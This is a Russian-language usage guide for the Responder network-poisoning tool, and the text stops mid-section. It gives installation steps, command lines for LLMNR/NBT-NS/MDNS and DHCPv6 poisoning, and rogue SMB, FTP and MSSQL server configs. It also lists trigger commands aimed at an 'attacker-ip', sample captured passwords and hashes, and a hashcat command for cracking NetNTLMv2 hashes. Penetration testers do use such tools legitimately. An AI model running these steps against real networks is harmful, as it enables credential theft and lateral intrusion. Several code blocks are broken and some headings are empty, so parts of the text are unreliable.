
Responder — это отравитель LLMNR, NBT-NS и MDNS, со встроенным поддельным сервером аутентификации HTTP/SMB/MSSQL/FTP/LDAP, поддерживающим NTLMv1/NTLMv2/LMv2, расширенную безопасность NTLMSSP и базовую HTTP-аутентификацию.
Responder — это отравитель LLMNR, NBT-NS и MDNS со встроенными подставными серверами аутентификации для HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS и других. Он поддерживает NTLMv1/NTLMv2/LMv2, расширенную безопасность NTLMSSP и различные методы аутентификации для более чем 15 протоколов.
Responder захватывает учетные данные, отвечая на запросы разрешения имен LLMNR, NBT-NS и MDNS. Когда клиент пытается разрешить несуществующее имя хоста, Responder отвечает, направляя клиента на машину атакующего, где несколько подставных серверов аутентификации захватывают учетные данные. Подставные серверы DHCP, DHCPv6 также включены и могут быть активированы отдельно.
Захваченные данные:
Эта версия включает:
sudo apt-get update sudo apt-get install python3 python3-pip python3-netifaces
### Установка Responder```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
---
## Быстрый старт
### Базовое отравление```bash
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
sudo python3 Responder.py -I eth0 --dhcpv6 -v
### Принудительный HTTP Basic Auth```bash
sudo python3 Responder.py -I eth0 -b -v
sudo python3 Responder.py -I eth0 -Pvd
---
## Отравление сети
### Отравление LLMNR/NBT-NS/MDNS
**Цель:** Отвечать на сбои разрешения имен
**Как это работает:**
1. Клиент отправляет широковещательный запрос для несуществующего хоста
2. Responder отвечает: «Я этот хост»
3. Клиент подключается к атакующему
4. Захвачены учетные данные
**Конфигурация:**```ini
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Использование:```bash sudo python3 Responder.py -I eth0 -v
---
### DHCPv6 Сервер
**Цель:** Принуждение клиентов к использованию DNS атакующего через IPv6
**Возможности:**
- ✅ Поддержка INFORMATION-REQUEST (Windows 10/11)
- ✅ Поддержка SOLICIT/REQUEST
- ✅ Фильтрация доменов (точечное нацеливание)
- ✅ Router Advertisement (опционально)
**Как это работает:**
1. Windows отправляет DHCPv6 INFORMATION-REQUEST, SOLICIT, REQUEST
2. Responder отвечает: DNS = IPv6 атакующего
3. Windows отдает приоритет IPv6 DNS
4. Все DNS запросы → атакующий
5. Отравление DNS → захват учетных данных
**Конфигурация:**```ini
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Использование:```bash sudo python3 Responder.py -I eth0 --dhcpv6 -v
**Ожидаемый вывод:**```
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder включает 17+ мошеннических серверов аутентификации:
Назначение: Захват хэшей NetNTLM из общих файловых ресурсов
Возможности:
Триггеры:```powershell
\attacker-ip\share \non-existent-server\files
net use \attacker-ip\share
\attacker-ip\
**Захваченный формат:**```
username::domain:challenge:response:blob
Взлом:```bash hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
**Конфигурация:**```ini
[Responder Core]
SMB = On
Назначение: Захват незашифрованных учётных данных FTP
Возможности:
Триггеры:```bash ftp attacker-ip
**Захваченный формат:**```
[FTP] Cleartext: username:password
Конфигурация:```ini [Responder Core] FTP = On
---
### Серверы баз данных
#### MSSQL Server (Порт 1433)
**Назначение:** Захват аутентификации Microsoft SQL Server
**Особенности:**
- ✅ Аутентификация SQL Server
- ✅ Аутентификация Windows (NTLM)
- ✅ SQL-учетные данные в открытом виде
- ✅ Захват хэша NetNTLMv2
**Триггеры:**```sql
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Захваченные форматы:``` [MSSQL] SQL Auth: sa:password123 [MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
**Конфигурация:**```ini
[Responder Core]
SQL = On
Примечания:
Назначение: Захват аутентификации почтовых клиентов
Особенности: